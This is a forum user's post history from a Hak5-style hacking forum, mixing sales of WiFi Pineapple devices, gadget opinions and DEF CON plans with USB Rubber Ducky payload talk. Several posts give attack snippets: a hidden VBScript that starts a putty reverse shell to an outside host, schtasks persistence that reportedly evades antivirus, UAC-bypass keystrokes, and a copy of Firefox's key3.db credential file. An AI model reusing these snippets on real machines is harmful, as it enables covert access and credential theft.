sober
-
Posts
79 -
Joined
-
Last visited
-
Days Won
2
Posts posted by sober
-
-
Hello Sober,
50 dollar for the pineapple mark V only with dc connector
i live in the Netherlands so you need to ship it i pay the extra costs
if you're interested send me a mail to noamxx@hotmail.com
as i find myself suddenly jobless and i know shipping costs will probably be quite high i would be interested assuming its legal to be sent to you, we agree on payment etc never mailed internationally however so will need to read into process.
-
just updating main post, just started a job but was unemployed for 3 months which led to me being unable to check hak5 for a bit but im back bebe.
student in need of cash asap accepting all reasonable offers, prefer local have
1. the mk5 bundle https://hakshop.myshopify.com/products/sale-wifi-pineapple-mark-v-travel-bundle-1800
used once in a presentation but other then that like new with all accessories and box
looking for ~80 local ~95 shipped/paypal
2. a mk4 with antenna and potentially the dbi panel works fine has jasager sticker on it but has been used
looking for ~40 local ~55 shipped/paypal
3. both 100 local 125 shipped
if you have any questions, would like to see pictures, would rather i put on ebay pm me and i will give you my email address which i check much more often.
-
do a complete scan on a found ip then see if it loads anything ;)
also i got you a present
http://www.offensive-security.com/metasploit-unleashed/Introduction
its best to learn how to use metasploit, a decent way to start would be the above guide and the below vm
http://www.offensive-security.com/metasploit-unleashed/Metasploitable
then follow up with this guide
http://www.metasploit.com/help/test-lab.jsp
it gives you more vulnerable virtual machines, as well as giving you the basics of setting up your own lab of multiple machines, the goal of course being to mix things up, and even try to lock down servers yourself then attack them.
the provided materials should keep you busy for awhile, have fun
-
wget seems like an easy script to automate, but if you want to write a full package with multiple script generators its a good start, and i would not mind helping incorporate some of the example scripts, that and add a "persistence" button ;)
-
Mabe Hak 5 should sell these in the store. Would be awesome!
I bet someone could solder a USB hub between the computer and the mouse and ducky plugin.
hell you could just grab a usb extender cord, and hollow out a wireless mouse's battery slot some more, bottom wouldn't look great, but not many people checking the bottom of your mouse.
-
strongly opposed to both. but im a spoil sport.
-
Just the Droid line of phones or all of Android? ;)
i own an android phone and an iphone, i dont prefer one over the other.
its mostly the droid tablets im not a big fan of, i dont like the ipad either, but the interface of both just dont mesh well with me, full disclosure time i own a surface, and an ipad, and have plenty of experience with android tabs, i never liked the ipad and gave it to my dad, and love my surface even though that doesn't seem to be a popular opinion to have.
long story short i dont like touchscreen very much, and i dont like the way the industry is going towards it, i want something with an easy to use attachable keyboard, that is easily portable will edit any document for uni work, help me take notes, play my video files, music, and read pdfs with a usb port to easily move media back and forth. my only gripes with the non pro surface is they are trying to go more to the apple side and lock things down. i have to "jailbreak" it to get java(not full do all java) and non allowed executables to run.
the main reason i want a tablet is portability, when i want to do the heavy lifting i use my desktop, or my asus gaming laptop, or use the remote desktop app to remote into my desktop if need be.
-
lul well i doubt there going to use apple hardware
Not really sooo many new apps / hacks / code etc released weekly and hacking is very diverse
don't get me wrong I dislike apple I don't care for droid
-
-
try a 5000 ms delay at beginning as well as STRING COPY key3.db %homepath%\Contacts needs a file name specified on copys for starters
-
pptp, or microsofts implementation is also broken vheck ipredator site for details, nvpn tos says they keep and share logs so that's fail, ipredator does not log making it harder to identify who had what ip at one time, but nothing is surefire, wardrive and torbest bet
-
-
still needs some constructing so work in progress
premise: modify win 8 surface batchfile including adding jailbreak to startup, install putty for surface. vbsscript for reverse shell hidden. add to startup w/ schtasks
tasks: modify batch (in progress also need to make sure when added to startup do not need volume depress)
http://forum.xda-developers.com/showthread.php?t=2092158
putty on surface:
http://forum.xda-developers.com/showthread.php?t=2092348
powershell on rt:
http://jeffwouters.nl/index.php/2012/10/windows-rt-has-powershell/
vbs script for putty:
Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.Run "putty.exe -ssh -2 user@sever.com -pw password -m command.cmd", 0' 0 => hideschtasks:
my other psts in this forum
needed: need to look at ducky coding for volume down button else hit it manually
did this`because was feeling bit too safe on my surface
discuss?
-
What about just getting round any UAC with the duck?
LEFT ARROW
DELAY 500
ENTER
The UAC's inherent trust that there is someone at the computer typing is one of the flaws that the duck was designed to bypass.
problem here is that if you must type an admin password in to run admin cmd prompt, this wont work as a standard user cant access schtasks without running as admin.
-
I think for escalation of privileges we would need some form of exploit that would take control of an application running under admin privileges right?
typically yes, as it sits this will work on standard home users pcs, but not accounts with restricted access.
-
people calling their apps sad, i dont have any apps, i have my phone rooted and have pirni, but i dont have apps or use them, except for netflix once a month. i only use my phone to call, and occasionally text.
-
Looks like a good idea.
But isn't c:\windows\system32 protected, you need admin permissions to write there, and the user my not have these rights?
originally potentially misunderstood, the exe is in sys32 and as such can not be ran by a non admin/ user who needs admin password to run exes as admin without some sort of escalation of privs
-
im not a big android fan and its not why i watch hak5, but watching a few episodes of tnt i can say i much prefer hak5.
-
bar, vegas, hak5, you know im in.
-
just booked my room for defcon this year, wondering who else from the forums will be showing up.
-
Looks like a good idea.
But isn't c:\windows\system32 protected, you need admin permissions to write there, and the user my not have these rights?
im sorry for confusion, this payload will work from any path, that is just an example i provided, here is an example provided by Microsoft from a different path
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc once
Is this much different than using "at"? Thank you by the way, this is pretty much perfect for my "FireFox Extinguisher" payload, if it works the way I think it does.
a page comparing both http://technet.microsoft.com/en-us/library/cc738335
i feel personally schtasks is an easier to use, fuller solution, plus to run an executable at first has to run cmd, which means a user may have cmd prompt flashing at startup they had not had before.
-
not going to cobble together other bypasses/disables/ payloads, i was interested in a reverse shell surviving a restart
use case: pen testing an establishment, infected machine is restarted or shut down before you have a chance to utilize shell
antivirus does not seem to care about this method of adding to startup.
http://technet.microsoft.com/en-us/library/cc772785(v=ws.10).aspx#BKMK_startup
To schedule a task that runs when a user logs on
Syntax
schtasks /create /tn TaskName /tr TaskRun /sc onlogon [/sd StartDate] [/it] [/ru {[Domain\]User [/rp Password] | System}] [/s Computer [/u [Domain\]User [/p Password]]]schtasks /create /tn "Crouching Goose hidden ducky" /tr c:\windows\system32\webstart.bat /sc onlogon
other potential "fun" uses
To schedule a task that runs when the system is idle
To schedule a task that runs with system permissions
To schedule a task that runs every N minutes
To schedule a task that runs every N hours
To schedule a task that runs every N days -
stripped down as in windows 8 rt? if so there is no domain joining or even local group policy. i see you have already looked at options provided but maybe below policy will help, i was talking with a coworker the other day and he said he had a nice setup for his children that didn't sound too invasive on the alerts end, i could get that info again and pass it on perhaps.
http://howto.cnet.com/8301-11310_39-57533877-285/how-to-use-parental-controls-in-windows-8/
-
i admit 0% knowledge of what im about to ask, couldnt you have a hard wired box using ics to have ad hoc wireless network, that should bypass this as to my knowledge ad hoc is peer to peer communication instead of using a central hub (router) to communicate.
mk5 package with box/bag mk4 with powercord [chicago area/ us shipping]
in Trading Post
Posted
this still exists, been unemployed causing interesting living situation... if anyone is interested at all please let me know.